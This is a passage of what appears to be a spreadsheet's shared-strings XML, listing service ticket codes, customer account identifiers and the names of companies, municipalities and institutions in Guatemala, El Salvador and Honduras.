    <t>CC_IJSUD_GT_SIQUINALA</t>
  </si>
  <si>
    <t>IDG000661SV</t>
  </si>
  <si>
    <t>SEVEN PARMA EL SALVADOR S.A DE C.V</t>
  </si>
  <si>
    <t>47503700T</t>
  </si>
  <si>
    <t>F4601042</t>
  </si>
  <si>
    <t>F4601043</t>
  </si>
  <si>
    <t>F4601045</t>
  </si>
  <si>
    <t>F4601060</t>
  </si>
  <si>
    <t>8901214T</t>
  </si>
  <si>
    <t>21337400SV</t>
  </si>
  <si>
    <t>A.C.E.C.E.N.T.A.</t>
  </si>
  <si>
    <t>910400034T</t>
  </si>
  <si>
    <t>252200008T</t>
  </si>
  <si>
    <t>CAMARA DE INDUSTRIA DE GUATEMALA</t>
  </si>
  <si>
    <t>1744579OH</t>
  </si>
  <si>
    <t>OH1000883933</t>
  </si>
  <si>
    <t>F4601086</t>
  </si>
  <si>
    <t>F4601093</t>
  </si>
  <si>
    <t>452610ON</t>
  </si>
  <si>
    <t>IP2133017SV</t>
  </si>
  <si>
    <t>IP2133018SV</t>
  </si>
  <si>
    <t>F4601120</t>
  </si>
  <si>
    <t>F4601139</t>
  </si>
  <si>
    <t>CONTR0002336242OC</t>
  </si>
  <si>
    <t>F4601158</t>
  </si>
  <si>
    <t>F4601161</t>
  </si>
  <si>
    <t>882900001T</t>
  </si>
  <si>
    <t>AUTOMAQ GUATEMALA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4533859</t>
  </si>
  <si>
    <t>F4572054</t>
  </si>
  <si>
    <t>331000089T</t>
  </si>
  <si>
    <t>727100019T</t>
  </si>
  <si>
    <t>3259127ON</t>
  </si>
  <si>
    <t>F4572102</t>
  </si>
  <si>
    <t>F4572103</t>
  </si>
  <si>
    <t>887500036T</t>
  </si>
  <si>
    <t>F4572143</t>
  </si>
  <si>
    <t>F4572162</t>
  </si>
  <si>
    <t>F4572205</t>
  </si>
  <si>
    <t>F4594641</t>
  </si>
  <si>
    <t>21320250SV</t>
  </si>
  <si>
    <t>PROIMAGENES, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4594653</t>
  </si>
  <si>
    <t>F4594673</t>
  </si>
  <si>
    <t>F4594674</t>
  </si>
  <si>
    <t>F4594675</t>
  </si>
  <si>
    <t>F4594676</t>
  </si>
  <si>
    <t>F4594683</t>
  </si>
  <si>
    <t>F4594694</t>
  </si>
  <si>
    <t>4268020ON</t>
  </si>
  <si>
    <t>F4594711</t>
  </si>
  <si>
    <t>F4594714</t>
  </si>
  <si>
    <t>F4594716</t>
  </si>
  <si>
    <t>F4594717</t>
  </si>
  <si>
    <t>F4594719</t>
  </si>
  <si>
    <t>697400001T</t>
  </si>
  <si>
    <t>F4594743</t>
  </si>
  <si>
    <t>F4594763</t>
  </si>
  <si>
    <t>313900273T</t>
  </si>
  <si>
    <t>F4607590</t>
  </si>
  <si>
    <t>340500107T</t>
  </si>
  <si>
    <t>ID1397002SV</t>
  </si>
  <si>
    <t>F4607607</t>
  </si>
  <si>
    <t>F4607610</t>
  </si>
  <si>
    <t>F4607614</t>
  </si>
  <si>
    <t>F4607615</t>
  </si>
  <si>
    <t>F4607631</t>
  </si>
  <si>
    <t>F4607633</t>
  </si>
  <si>
    <t>F4607644</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_MARTINICO</t>
  </si>
  <si>
    <t>ID1025035SV</t>
  </si>
  <si>
    <t>SWISSTEX EL SALVADOR</t>
  </si>
  <si>
    <t>F4607654</t>
  </si>
  <si>
    <t>F4607662</t>
  </si>
  <si>
    <t>F4607663</t>
  </si>
  <si>
    <t>F4607673</t>
  </si>
  <si>
    <t>F4607686</t>
  </si>
  <si>
    <t>F4607693</t>
  </si>
  <si>
    <t>F4607714</t>
  </si>
  <si>
    <t>F4607721</t>
  </si>
  <si>
    <t>F4607735</t>
  </si>
  <si>
    <t>F4607740</t>
  </si>
  <si>
    <t>F4607742</t>
  </si>
  <si>
    <t>F4581854</t>
  </si>
  <si>
    <t>F4581860</t>
  </si>
  <si>
    <t>F4581867</t>
  </si>
  <si>
    <t>F4581869</t>
  </si>
  <si>
    <t>F4581876</t>
  </si>
  <si>
    <t>F4581877</t>
  </si>
  <si>
    <t>F4581879</t>
  </si>
  <si>
    <t>F4581880</t>
  </si>
  <si>
    <t>574400002T</t>
  </si>
  <si>
    <t>ESTACION DE SERVICIOS EN EL CAMINO</t>
  </si>
  <si>
    <t>F4581890</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2093</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_4186</t>
  </si>
  <si>
    <t>F4581902</t>
  </si>
  <si>
    <t>F4581908</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_RAMA_SUMPANGO</t>
  </si>
  <si>
    <t>F4581910</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4186</t>
  </si>
  <si>
    <t>F4581912</t>
  </si>
  <si>
    <t>F4581917</t>
  </si>
  <si>
    <t>F4581919</t>
  </si>
  <si>
    <t>F4581923</t>
  </si>
  <si>
    <t>F4581934</t>
  </si>
  <si>
    <t>F4581935</t>
  </si>
  <si>
    <t>F4581941</t>
  </si>
  <si>
    <t>F4581942</t>
  </si>
  <si>
    <t>F4581948</t>
  </si>
  <si>
    <t>F4581972</t>
  </si>
  <si>
    <t>F4581982</t>
  </si>
  <si>
    <t>F4581984</t>
  </si>
  <si>
    <t>F4581986</t>
  </si>
  <si>
    <t>F4581987</t>
  </si>
  <si>
    <t>F4612408</t>
  </si>
  <si>
    <t>F4612420</t>
  </si>
  <si>
    <t>F4612422</t>
  </si>
  <si>
    <t>F4612424</t>
  </si>
  <si>
    <t>F4612448</t>
  </si>
  <si>
    <t>F4612449</t>
  </si>
  <si>
    <t>268700012T</t>
  </si>
  <si>
    <t>887500043T</t>
  </si>
  <si>
    <t>F4612478</t>
  </si>
  <si>
    <t>F4612481</t>
  </si>
  <si>
    <t>4441197ON</t>
  </si>
  <si>
    <t>F4612486</t>
  </si>
  <si>
    <t>F4612496</t>
  </si>
  <si>
    <t>F4612516</t>
  </si>
  <si>
    <t>F4612517</t>
  </si>
  <si>
    <t>F4612556</t>
  </si>
  <si>
    <t>OH1000743263/REPARACIONES INTERMODALES (REINTER) REPARACIONES INTERMOD</t>
  </si>
  <si>
    <t>IPG003088SV</t>
  </si>
  <si>
    <t>F4618673</t>
  </si>
  <si>
    <t>F4618679</t>
  </si>
  <si>
    <t>IDG000031SV</t>
  </si>
  <si>
    <t>RETAIL SPORTS, S.A. DE C.V.</t>
  </si>
  <si>
    <t>IP2036066SV</t>
  </si>
  <si>
    <t>NEJAPA POWER COMPANY S.A</t>
  </si>
  <si>
    <t>90001910447T</t>
  </si>
  <si>
    <t>827600002T</t>
  </si>
  <si>
    <t>ARQUIPOR SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>495700003T</t>
  </si>
  <si>
    <t>CENTRO COMERCIAL METROPLAZA MUNDO MAYA</t>
  </si>
  <si>
    <t>IP2028520SV</t>
  </si>
  <si>
    <t>F4618709</t>
  </si>
  <si>
    <t>IP2165249SV</t>
  </si>
  <si>
    <t>F4618715</t>
  </si>
  <si>
    <t>90001902171T</t>
  </si>
  <si>
    <t>399700004T</t>
  </si>
  <si>
    <t>SISTEMS ENTERPRISE, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>316500002T</t>
  </si>
  <si>
    <t>UNIVERSIDAD RAFAEL LANDIVAR.</t>
  </si>
  <si>
    <t>947200001T</t>
  </si>
  <si>
    <t>F4618742</t>
  </si>
  <si>
    <t>CONTR0001879160OC</t>
  </si>
  <si>
    <t>AKROS CORREDORES DE SEGUROS SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4618750</t>
  </si>
  <si>
    <t>F4618751</t>
  </si>
  <si>
    <t>90001910057T</t>
  </si>
  <si>
    <t>856000014T</t>
  </si>
  <si>
    <t>F4618770</t>
  </si>
  <si>
    <t>F4618776</t>
  </si>
  <si>
    <t>F4618777</t>
  </si>
  <si>
    <t>F4618780</t>
  </si>
  <si>
    <t>F4618796</t>
  </si>
  <si>
    <t>F4618809</t>
  </si>
  <si>
    <t>4542763ON</t>
  </si>
  <si>
    <t>ON0000087918/COPROVASA</t>
  </si>
  <si>
    <t>F4618815</t>
  </si>
  <si>
    <t>F4586274</t>
  </si>
  <si>
    <t>CONTR0002180697OC</t>
  </si>
  <si>
    <t>DHL AERO EXPRESO S A</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4504</t>
  </si>
  <si>
    <t>CONTR0002180798OC</t>
  </si>
  <si>
    <t>F4586290</t>
  </si>
  <si>
    <t>F4586291</t>
  </si>
  <si>
    <t>F4586294</t>
  </si>
  <si>
    <t>F4586298</t>
  </si>
  <si>
    <t>F4586310</t>
  </si>
  <si>
    <t>8901784T</t>
  </si>
  <si>
    <t>F4586317</t>
  </si>
  <si>
    <t>927700005T</t>
  </si>
  <si>
    <t>F4586328</t>
  </si>
  <si>
    <t>1727408OH</t>
  </si>
  <si>
    <t>F4586333</t>
  </si>
  <si>
    <t>F4586335</t>
  </si>
  <si>
    <t>F4586337</t>
  </si>
  <si>
    <t>811300002T</t>
  </si>
  <si>
    <t>UNIVERSIDAD MARIANO GALVEZ DE GUATEMALA</t>
  </si>
  <si>
    <t>3666457ON</t>
  </si>
  <si>
    <t>F4586345</t>
  </si>
  <si>
    <t>F4586351</t>
  </si>
  <si>
    <t>F4586352</t>
  </si>
  <si>
    <t>F4586359</t>
  </si>
  <si>
    <t>F4586360</t>
  </si>
  <si>
    <t>F4586364</t>
  </si>
  <si>
    <t>F4586369</t>
  </si>
  <si>
    <t>3765194ON</t>
  </si>
  <si>
    <t>F4586380</t>
  </si>
  <si>
    <t>F4586385</t>
  </si>
  <si>
    <t>F4586388</t>
  </si>
  <si>
    <t>1689084OH</t>
  </si>
  <si>
    <t>261100009T</t>
  </si>
  <si>
    <t>F4586409</t>
  </si>
  <si>
    <t>F4557114</t>
  </si>
  <si>
    <t>7900148T</t>
  </si>
  <si>
    <t>593835ON</t>
  </si>
  <si>
    <t>F4557129</t>
  </si>
  <si>
    <t>286900028T</t>
  </si>
  <si>
    <t>F4557134</t>
  </si>
  <si>
    <t>90001908962T</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_SANTA_ELENA_019</t>
  </si>
  <si>
    <t>F4557151</t>
  </si>
  <si>
    <t>F4557174</t>
  </si>
  <si>
    <t>F4557176</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0467</t>
  </si>
  <si>
    <t>F4557187</t>
  </si>
  <si>
    <t>F4557191</t>
  </si>
  <si>
    <t>F4557194</t>
  </si>
  <si>
    <t>F4557196</t>
  </si>
  <si>
    <t>F4557204</t>
  </si>
  <si>
    <t>F4557213</t>
  </si>
  <si>
    <t>F4557217</t>
  </si>
  <si>
    <t>8901744T</t>
  </si>
  <si>
    <t>F4557221</t>
  </si>
  <si>
    <t>F4557230</t>
  </si>
  <si>
    <t>575400001T</t>
  </si>
  <si>
    <t>DROGUERIA BENDICION Y FE SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4557233</t>
  </si>
  <si>
    <t>F4557236</t>
  </si>
  <si>
    <t>F4557237</t>
  </si>
  <si>
    <t>F4557238</t>
  </si>
  <si>
    <t>937900001T</t>
  </si>
  <si>
    <t>REDCOM</t>
  </si>
  <si>
    <t>F4557257</t>
  </si>
  <si>
    <t>F4585596</t>
  </si>
  <si>
    <t>F4585598</t>
  </si>
  <si>
    <t>F4585611</t>
  </si>
  <si>
    <t>F4585625</t>
  </si>
  <si>
    <t>F4585627</t>
  </si>
  <si>
    <t>F4585630</t>
  </si>
  <si>
    <t>1488474OH</t>
  </si>
  <si>
    <t>DISTRIBUIDORA LABTECH S DE RL DE CV</t>
  </si>
  <si>
    <t>F4585643</t>
  </si>
  <si>
    <t>809725OH</t>
  </si>
  <si>
    <t>F4585660</t>
  </si>
  <si>
    <t>23471300SV</t>
  </si>
  <si>
    <t>ACAPRODUSCA DE R. L.</t>
  </si>
  <si>
    <t>F4585673</t>
  </si>
  <si>
    <t>F4585674</t>
  </si>
  <si>
    <t>F4585680</t>
  </si>
  <si>
    <t>F4585684</t>
  </si>
  <si>
    <t>610749OH</t>
  </si>
  <si>
    <t>1516294OH</t>
  </si>
  <si>
    <t>F4585689</t>
  </si>
  <si>
    <t>579000001T</t>
  </si>
  <si>
    <t>VOLCAN DE AGUA SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>613200001T</t>
  </si>
  <si>
    <t>JUDEX ESTUDIO SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4602454</t>
  </si>
  <si>
    <t>F4602457</t>
  </si>
  <si>
    <t>508200003T</t>
  </si>
  <si>
    <t>F4602470</t>
  </si>
  <si>
    <t>F4602477</t>
  </si>
  <si>
    <t>F4602492</t>
  </si>
  <si>
    <t>427100035T</t>
  </si>
  <si>
    <t>F4602495</t>
  </si>
  <si>
    <t>F4602511</t>
  </si>
  <si>
    <t>F4602515</t>
  </si>
  <si>
    <t>F4602526</t>
  </si>
  <si>
    <t>F4602527</t>
  </si>
  <si>
    <t>F4602535</t>
  </si>
  <si>
    <t>F4602538</t>
  </si>
  <si>
    <t>ID1322000SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL OJOS DE AGUA</t>
  </si>
  <si>
    <t>F4602561</t>
  </si>
  <si>
    <t>F4602565</t>
  </si>
  <si>
    <t>865400001T</t>
  </si>
  <si>
    <t>NEKTECH, S.A.</t>
  </si>
  <si>
    <t>90001902263T</t>
  </si>
  <si>
    <t>452907ON</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_EL_FISCAL</t>
  </si>
  <si>
    <t>F4602592</t>
  </si>
  <si>
    <t>F4573224</t>
  </si>
  <si>
    <t>F4573228</t>
  </si>
  <si>
    <t>F4573235</t>
  </si>
  <si>
    <t>F4573237</t>
  </si>
  <si>
    <t>F4573241</t>
  </si>
  <si>
    <t>ID1067033SV</t>
  </si>
  <si>
    <t>LA BODEGUITA DEL CERDITO SA DE CV</t>
  </si>
  <si>
    <t>F4573260</t>
  </si>
  <si>
    <t>F4573263</t>
  </si>
  <si>
    <t>F4573267</t>
  </si>
  <si>
    <t>F4573269</t>
  </si>
  <si>
    <t>F4573270</t>
  </si>
  <si>
    <t>F4573277</t>
  </si>
  <si>
    <t>F4573280</t>
  </si>
  <si>
    <t>F4573285</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_COATEPEQUE</t>
  </si>
  <si>
    <t>629100026T</t>
  </si>
  <si>
    <t>F4573292</t>
  </si>
  <si>
    <t>F4573294</t>
  </si>
  <si>
    <t>F4573295</t>
  </si>
  <si>
    <t>427100088T</t>
  </si>
  <si>
    <t>F4573300</t>
  </si>
  <si>
    <t>F4573305</t>
  </si>
  <si>
    <t>F4573306</t>
  </si>
  <si>
    <t>F4573312</t>
  </si>
  <si>
    <t>F4573318</t>
  </si>
  <si>
    <t>292900140T</t>
  </si>
  <si>
    <t>547400018T</t>
  </si>
  <si>
    <t>F4573332</t>
  </si>
  <si>
    <t>F4573337</t>
  </si>
  <si>
    <t>F4573343</t>
  </si>
  <si>
    <t>F4573344</t>
  </si>
  <si>
    <t>F4573354</t>
  </si>
  <si>
    <t>F4573357</t>
  </si>
  <si>
    <t>F4595591</t>
  </si>
  <si>
    <t>4789352ON</t>
  </si>
  <si>
    <t>F4595603</t>
  </si>
  <si>
    <t>F4595608</t>
  </si>
  <si>
    <t>F4595619</t>
  </si>
  <si>
    <t>F4595620</t>
  </si>
  <si>
    <t>829800048T</t>
  </si>
  <si>
    <t>ID1026346SV</t>
  </si>
  <si>
    <t xml:space="preserve">SOLUTION BOX EL SALVADOR, S.A. DE C.V.										</t>
  </si>
  <si>
    <t>F4595653</t>
  </si>
  <si>
    <t>F4595654</t>
  </si>
  <si>
    <t>F4595669</t>
  </si>
  <si>
    <t>F4595670</t>
  </si>
  <si>
    <t>F4595671</t>
  </si>
  <si>
    <t>F4595672</t>
  </si>
  <si>
    <t>5618326ON</t>
  </si>
  <si>
    <t>IBEX GLOBAL NICARAGUA</t>
  </si>
  <si>
    <t>F4595690</t>
  </si>
  <si>
    <t>F4595697</t>
  </si>
  <si>
    <t>F4595700</t>
  </si>
  <si>
    <t>927300001T</t>
  </si>
  <si>
    <t>"TECNO MUNDO"</t>
  </si>
  <si>
    <t>720072OH</t>
  </si>
  <si>
    <t>5523365ON</t>
  </si>
  <si>
    <t>F4595747</t>
  </si>
  <si>
    <t>F4595748</t>
  </si>
  <si>
    <t>F4608315</t>
  </si>
  <si>
    <t>F4608332</t>
  </si>
  <si>
    <t>F4608346</t>
  </si>
  <si>
    <t>F4608416</t>
  </si>
  <si>
    <t>F4608417</t>
  </si>
  <si>
    <t>IP2165223SV</t>
  </si>
  <si>
    <t>ID1028586SV</t>
  </si>
  <si>
    <t>F4608423</t>
  </si>
  <si>
    <t>455254ON</t>
  </si>
  <si>
    <t>F4608428</t>
  </si>
  <si>
    <t>245700299T</t>
  </si>
  <si>
    <t>F4608432</t>
  </si>
  <si>
    <t>F4608437</t>
  </si>
  <si>
    <t>F4608439</t>
  </si>
  <si>
    <t>418200003T</t>
  </si>
  <si>
    <t>NATURAL WOODS DESING S.A.</t>
  </si>
  <si>
    <t>F4584305</t>
  </si>
  <si>
    <t>90001908955T</t>
  </si>
  <si>
    <t>F4584311</t>
  </si>
  <si>
    <t>F4584332</t>
  </si>
  <si>
    <t>4074530ON</t>
  </si>
  <si>
    <t>ON0002331939/GENTE MAS GENTE S.AGENTE MAS GENTE S.A</t>
  </si>
  <si>
    <t>288700045T</t>
  </si>
  <si>
    <t>23470800SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL TAMANIQUE</t>
  </si>
  <si>
    <t>F4584346</t>
  </si>
  <si>
    <t>5498018ON</t>
  </si>
  <si>
    <t>F4584351</t>
  </si>
  <si>
    <t>F4584356</t>
  </si>
  <si>
    <t>IP2382006SV</t>
  </si>
  <si>
    <t>555300007T</t>
  </si>
  <si>
    <t>F4584371</t>
  </si>
  <si>
    <t>F4584376</t>
  </si>
  <si>
    <t>F4584391</t>
  </si>
  <si>
    <t>F4584396</t>
  </si>
  <si>
    <t>F4584402</t>
  </si>
  <si>
    <t>CC_GMG_GT_TIENDA_29</t>
  </si>
  <si>
    <t>629100029T</t>
  </si>
  <si>
    <t>F4584410</t>
  </si>
  <si>
    <t>IP2171006SV</t>
  </si>
  <si>
    <t>F4612929</t>
  </si>
  <si>
    <t>F4612930</t>
  </si>
  <si>
    <t>90001909713T</t>
  </si>
  <si>
    <t>F4612963</t>
  </si>
  <si>
    <t>F4612974</t>
  </si>
  <si>
    <t>F4612992</t>
  </si>
  <si>
    <t>86100098T</t>
  </si>
  <si>
    <t>70170OH</t>
  </si>
  <si>
    <t>F4613014</t>
  </si>
  <si>
    <t>61200212T</t>
  </si>
  <si>
    <t>61200198T</t>
  </si>
  <si>
    <t>61200205T</t>
  </si>
  <si>
    <t>61200202T</t>
  </si>
  <si>
    <t>F4613045</t>
  </si>
  <si>
    <t>F4613046</t>
  </si>
  <si>
    <t>F4613051</t>
  </si>
  <si>
    <t>F4618829</t>
  </si>
  <si>
    <t>1724991OH</t>
  </si>
  <si>
    <t>OH1001078106</t>
  </si>
  <si>
    <t>F4618848</t>
  </si>
  <si>
    <t>F4618860</t>
  </si>
  <si>
    <t>533200001T</t>
  </si>
  <si>
    <t>F4618889</t>
  </si>
  <si>
    <t>CC_FICOHSA_GT_SERCOM_HONDURAS</t>
  </si>
  <si>
    <t>F4618899</t>
  </si>
  <si>
    <t>F4618902</t>
  </si>
  <si>
    <t>F4618903</t>
  </si>
  <si>
    <t>F4618905</t>
  </si>
  <si>
    <t>F4618909</t>
  </si>
  <si>
    <t>F4618911</t>
  </si>
  <si>
    <t>F4618913</t>
  </si>
  <si>
    <t>LA IGLESIA DE JESUCRISTO DE LOS SANTOS DE LOS ULTIMOS DIAS</t>
  </si>
  <si>
    <t>952000002T</t>
  </si>
  <si>
    <t>UNIDAD DEL NUEVO MODELO DE GESTION PENITENCIARIA-UNMGP</t>
  </si>
  <si>
    <t>90001910928T</t>
  </si>
  <si>
    <t>F4618922</t>
  </si>
  <si>
    <t>305100014T</t>
  </si>
  <si>
    <t>F4618929</t>
  </si>
  <si>
    <t>F4618933</t>
  </si>
  <si>
    <t>ID1182047SV</t>
  </si>
  <si>
    <t>TEXTILES LA PAZ L.L.C.</t>
  </si>
  <si>
    <t>F4618955</t>
  </si>
  <si>
    <t>F4618956</t>
  </si>
  <si>
    <t>F4618961</t>
  </si>
  <si>
    <t>F4618966</t>
  </si>
  <si>
    <t>F4618969</t>
  </si>
  <si>
    <t>F4621004</t>
  </si>
  <si>
    <t>F4621066</t>
  </si>
  <si>
    <t>F4536628</t>
  </si>
  <si>
    <t>F4557270</t>
  </si>
  <si>
    <t>F4557274</t>
  </si>
  <si>
    <t>F4557280</t>
  </si>
  <si>
    <t>F4557287</t>
  </si>
  <si>
    <t>F4557291</t>
  </si>
  <si>
    <t>863400262T</t>
  </si>
  <si>
    <t>F4557297</t>
  </si>
  <si>
    <t>F4557304</t>
  </si>
  <si>
    <t>F4557305</t>
  </si>
  <si>
    <t>F4557321</t>
  </si>
  <si>
    <t>863400033T</t>
  </si>
  <si>
    <t>F4557329</t>
  </si>
  <si>
    <t>F4557342</t>
  </si>
  <si>
    <t>F4557355</t>
  </si>
  <si>
    <t>F4557358</t>
  </si>
  <si>
    <t>F4557359</t>
  </si>
  <si>
    <t>F4557361</t>
  </si>
  <si>
    <t>F4557362</t>
  </si>
  <si>
    <t>4770842ON</t>
  </si>
  <si>
    <t>F4557366</t>
  </si>
  <si>
    <t>652280OH</t>
  </si>
  <si>
    <t>IP2072018SV</t>
  </si>
  <si>
    <t>F4557401</t>
  </si>
  <si>
    <t>F4557409</t>
  </si>
  <si>
    <t>F4586933</t>
  </si>
  <si>
    <t>4740756ON</t>
  </si>
  <si>
    <t>F4587014</t>
  </si>
  <si>
    <t>F4587023</t>
  </si>
  <si>
    <t>ID1310005SV</t>
  </si>
  <si>
    <t>F4587048</t>
  </si>
  <si>
    <t>F4587072</t>
  </si>
  <si>
    <t>F4587076</t>
  </si>
  <si>
    <t>F4604572</t>
  </si>
  <si>
    <t>F4604578</t>
  </si>
  <si>
    <t>F4604585</t>
  </si>
  <si>
    <t>F4604609</t>
  </si>
  <si>
    <t>47502376T</t>
  </si>
  <si>
    <t>4105113ON</t>
  </si>
  <si>
    <t>22403700SV</t>
  </si>
  <si>
    <t>F4604636</t>
  </si>
  <si>
    <t>F4604644</t>
  </si>
  <si>
    <t>F4604646</t>
  </si>
  <si>
    <t>F4604655</t>
  </si>
  <si>
    <t>25295800SV</t>
  </si>
  <si>
    <t>ASOCIACION DE MUJERES POR LA DIGNIDAD Y LA VIDA</t>
  </si>
  <si>
    <t>344400252T</t>
  </si>
  <si>
    <t>802700038T</t>
  </si>
  <si>
    <t>F4604737</t>
  </si>
  <si>
    <t>F4540426</t>
  </si>
  <si>
    <t>F4540515</t>
  </si>
  <si>
    <t>425500043T</t>
  </si>
  <si>
    <t>F4574163</t>
  </si>
  <si>
    <t>F4574164</t>
  </si>
  <si>
    <t>F4574165</t>
  </si>
  <si>
    <t>F4574166</t>
  </si>
  <si>
    <t>911800001T</t>
  </si>
  <si>
    <t>ASOCIACION SALESIANA DE DON BOSCO .</t>
  </si>
  <si>
    <t>450877ON</t>
  </si>
  <si>
    <t>F4574176</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0479</t>
  </si>
  <si>
    <t>26657000SV</t>
  </si>
  <si>
    <t>F4574181</t>
  </si>
  <si>
    <t>617100002T</t>
  </si>
  <si>
    <t>ASERORIA EN TRATAMIENTO DE AGUA JUMASA S.A.</t>
  </si>
  <si>
    <t>4986996ON</t>
  </si>
  <si>
    <t>F4574185</t>
  </si>
  <si>
    <t>F4574187</t>
  </si>
  <si>
    <t>F4574191</t>
  </si>
  <si>
    <t>90001905442T</t>
  </si>
  <si>
    <t>510892ON</t>
  </si>
  <si>
    <t>F4574195</t>
  </si>
  <si>
    <t>345700001T</t>
  </si>
  <si>
    <t>ABSORTEX SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>4767360ON</t>
  </si>
  <si>
    <t>F4574202</t>
  </si>
  <si>
    <t>90001905036T</t>
  </si>
  <si>
    <t>F4574212</t>
  </si>
  <si>
    <t>458090ON</t>
  </si>
  <si>
    <t>4189797ON</t>
  </si>
  <si>
    <t>F4574222</t>
  </si>
  <si>
    <t>3611753ON</t>
  </si>
  <si>
    <t>F4574232</t>
  </si>
  <si>
    <t>IP2045269SV</t>
  </si>
  <si>
    <t>F4574246</t>
  </si>
  <si>
    <t>F4574253</t>
  </si>
  <si>
    <t>528369ON</t>
  </si>
  <si>
    <t>F4574259</t>
  </si>
  <si>
    <t>F4574260</t>
  </si>
  <si>
    <t>F4574261</t>
  </si>
  <si>
    <t>17400263T</t>
  </si>
  <si>
    <t>826900003T</t>
  </si>
  <si>
    <t>F4574270</t>
  </si>
  <si>
    <t>F4574281</t>
  </si>
  <si>
    <t>1618389OH</t>
  </si>
  <si>
    <t>BANCO AZTECA DE HONDURAS S A</t>
  </si>
  <si>
    <t>F4574290</t>
  </si>
  <si>
    <t>F4574293</t>
  </si>
  <si>
    <t>90001905329T</t>
  </si>
  <si>
    <t>F4574296</t>
  </si>
  <si>
    <t>F4574299</t>
  </si>
  <si>
    <t>672700027T</t>
  </si>
  <si>
    <t>F4595915</t>
  </si>
  <si>
    <t>F4595920</t>
  </si>
  <si>
    <t>ID1341001SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL SAN FRANCISCO MENENDEZ</t>
  </si>
  <si>
    <t>F4595937</t>
  </si>
  <si>
    <t>F4595941</t>
  </si>
  <si>
    <t>ID1135027SV</t>
  </si>
  <si>
    <t>INGENIO LA MAGDALENA,S.A</t>
  </si>
  <si>
    <t>292900044T</t>
  </si>
  <si>
    <t>F4595952</t>
  </si>
  <si>
    <t>F4595957</t>
  </si>
  <si>
    <t>F4595965</t>
  </si>
  <si>
    <t>3965146ON</t>
  </si>
  <si>
    <t>F4595978</t>
  </si>
  <si>
    <t>F4595988</t>
  </si>
  <si>
    <t>F4595989</t>
  </si>
  <si>
    <t>F4595998</t>
  </si>
  <si>
    <t>F4596005</t>
  </si>
  <si>
    <t>F4596009</t>
  </si>
  <si>
    <t>23435000SV</t>
  </si>
  <si>
    <t>F4596026</t>
  </si>
  <si>
    <t>305100015T</t>
  </si>
  <si>
    <t>8900551T</t>
  </si>
  <si>
    <t>90001902972T</t>
  </si>
  <si>
    <t>5434970ON</t>
  </si>
  <si>
    <t>ON0000350439/FERNANDEZ SERA S.A.-</t>
  </si>
  <si>
    <t>F4596050</t>
  </si>
  <si>
    <t>288700002T</t>
  </si>
  <si>
    <t>288700011T</t>
  </si>
  <si>
    <t>F4596057</t>
  </si>
  <si>
    <t>F4609060</t>
  </si>
  <si>
    <t>F4609064</t>
  </si>
  <si>
    <t>F4609070</t>
  </si>
  <si>
    <t>F4609074</t>
  </si>
  <si>
    <t>ID1405011SV</t>
  </si>
  <si>
    <t>ACOPALP DE R.L.</t>
  </si>
  <si>
    <t>F4609106</t>
  </si>
  <si>
    <t>F4609112</t>
  </si>
  <si>
    <t>758500112T</t>
  </si>
  <si>
    <t>483200031T</t>
  </si>
  <si>
    <t>90001910543T</t>
  </si>
  <si>
    <t>F4609138</t>
  </si>
  <si>
    <t>F4609146</t>
  </si>
  <si>
    <t>IP2087019SV</t>
  </si>
  <si>
    <t>F4609171</t>
  </si>
  <si>
    <t>1076404OH</t>
  </si>
  <si>
    <t>F4609176</t>
  </si>
  <si>
    <t>F4609178</t>
  </si>
  <si>
    <t>22013100SV</t>
  </si>
  <si>
    <t>HOSP NAC ENFERMERA ANGELICA VIDAL DE NAJARRO D SAN BARTOLO</t>
  </si>
  <si>
    <t>F4609196</t>
  </si>
  <si>
    <t>F4609197</t>
  </si>
  <si>
    <t>22057400SV</t>
  </si>
  <si>
    <t>MISION CRISTIANA NUEVO PACTO</t>
  </si>
  <si>
    <t>F4542330</t>
  </si>
  <si>
    <t>318400032T</t>
  </si>
  <si>
    <t>F4585850</t>
  </si>
  <si>
    <t>F4585852</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0833</t>
  </si>
  <si>
    <t>F4585856</t>
  </si>
  <si>
    <t>F4585859</t>
  </si>
  <si>
    <t>F4585861</t>
  </si>
  <si>
    <t>F4585871</t>
  </si>
  <si>
    <t>F4585874</t>
  </si>
  <si>
    <t>1360198OH</t>
  </si>
  <si>
    <t>ALUTECH SA DE CV</t>
  </si>
  <si>
    <t>F4585877</t>
  </si>
  <si>
    <t>F4585879</t>
  </si>
  <si>
    <t>807900493T</t>
  </si>
  <si>
    <t>F4585889</t>
  </si>
  <si>
    <t>F4585890</t>
  </si>
  <si>
    <t>F4585891</t>
  </si>
  <si>
    <t>F4585895</t>
  </si>
  <si>
    <t>F4585897</t>
  </si>
  <si>
    <t>770600146T</t>
  </si>
  <si>
    <t>F4585901</t>
  </si>
  <si>
    <t>F4585912</t>
  </si>
  <si>
    <t>F4585915</t>
  </si>
  <si>
    <t>646300001T</t>
  </si>
  <si>
    <t>ARIAS GUATEMALA, SERVICIOS JUTIDICOS, S.A.</t>
  </si>
  <si>
    <t>1322489OH</t>
  </si>
  <si>
    <t>OH1000742841/SECRETARIA DE DESARROLLO ECONOMICO -</t>
  </si>
  <si>
    <t>426100002T</t>
  </si>
  <si>
    <t>F4585926</t>
